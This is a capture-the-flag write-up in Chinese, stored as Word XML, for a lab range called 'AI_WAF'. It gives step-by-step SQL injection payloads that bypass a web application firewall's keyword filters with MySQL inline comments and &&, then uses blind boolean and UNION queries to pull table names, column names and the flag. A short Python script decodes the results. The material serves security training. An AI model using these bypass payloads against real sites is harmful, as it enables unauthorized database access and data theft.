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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>AI_WAF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290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1.打开靶场一个搜索页面，在搜索框随便输入点东西，用bp抓包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测试得到为单引号闭合，and，or，select，group，order，where，--都被过滤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and用&amp;&amp;代替，select和where可以用内联函数绕过，注释用#</w:t>
      </w:r>
    </w:p>
    <w:p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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>很多WAF在检测非法字符时，会认为/*...*/只是注释，为了性能会不检查，但mysql看到！后直接拆开包装运行，单纯过滤select等关键字是可以直接绕过的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US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2.获取数据库，payload：'&amp;&amp; ascii(substr(database(),1,1))&gt;0#</w:t>
      </w:r>
    </w:p>
    <w:p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得到：nexadata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显示content加id为1-13为正确页面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由于不会写脚本，是一个个字符测过去的，改substr的位置和与ascii大小比较的数即可，下面同理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6195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获取表格名，payload：'&amp;&amp; ascii(substr((/*!50000select*/ group_concat(table_name)from information_schema.tables /*!50000where*/ database()=table_schema),1,1))&gt;0#</w:t>
      </w:r>
    </w:p>
    <w:p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SimSun" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或'/*!50000AND*/ 1=1 /*!50000union*/ /*!50000select*/ 1,2,group_concat(table_name)from information_schema.tables /*!50000where*/ database()=table_schema#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得到：article,where_is_my_flagggggg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4.获取where_is_my_flagggggg表的列名，payload：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'/*!50000AND*/ 1=1 /*!50000union*/ /*!50000select*/ 1,2,group_concat(column_name)from information_schema.columns /*!50000where*/ database()=table_schema /*!50000AND*/  table_name='where_is_my_flagggggg'#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得到：Th15_ls_f149</w:t>
      </w:r>
    </w:p>
    <w:p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SimSun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获取flag，payload：'&amp;&amp; ascii(substr((/*!50000select*/ group_concat(Th15_ls_f149)from where_is_my_flagggggg),1,1))&gt;0#</w:t>
      </w:r>
    </w:p>
    <w:p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SimSun" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或'/*!50000AND*/ 1=1 /*!50000union*/ /*!50000select*/ 1,2,group_concat(Th15_ls_f149)from where_is_my_flagggggg#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将所有测试出来的ascii码组成列表，由于在测试时发现49,50两个连续的ascii码被过滤，所以在这两个数字之间不确定，我把测试到这种情况的ascii码在flag列表的索引记录下来了，把所有情况的flag都去提交直到成功即可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database=[110,101,120,97,100,97,116,97]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tables=[97,114,116,105,99,108,101,44,119,104,101,114,101,95,105,115,95,109,121,95,102,108,97,103,103,103,103,103,103]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columns=[84,104,49,53,95,108,115,95,102,49,52,57]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flag=[102,108,97,103,123,56,99,54,49,54,56,101,48,45,100,98,52,53,45,52,53,54,49,45,98,49,57,100,45,49,51,102,48,57,102,100,100,52,56,98,53,125]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print(flag[8],flag[22],flag[25],flag[29])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flag1=[]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i in flag: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flag1.append(chr(i))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print("database:",end='')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i in database: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print(chr(i),end='')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print('\n',"tables:",end='')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x in tables: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print(chr(x),end='')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print('\n',"columns:",end='')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x in columns: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print(chr(x),end='')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#print("flag{8c6268e0-db45-4561-b19d-23f09fdd48b5}")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x in range(2):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y in range(2):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z in range(2):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w in range(2):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flag2=flag1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flag2[8]=chr(49+x)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flag2[22]=chr(49+y)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flag2[25]=chr(49+z)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flag2[29]=chr(49+w)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for m in flag2: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print(m,end='')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print()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bookmarkEnd w:id="0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KogniGea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gniGear">
    <w:panose1 w:val="00000400000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000203" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="200101FF" w:csb1="CDFF0000"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:altName w:val="KogniGea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F8743"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BE7F874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45F10992"/>
    <w:rsid w:val="5BFA2576"/>
    <w:rsid w:val="EFD267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2025-12-29T11:33:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>hack</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-28T20:22:57Z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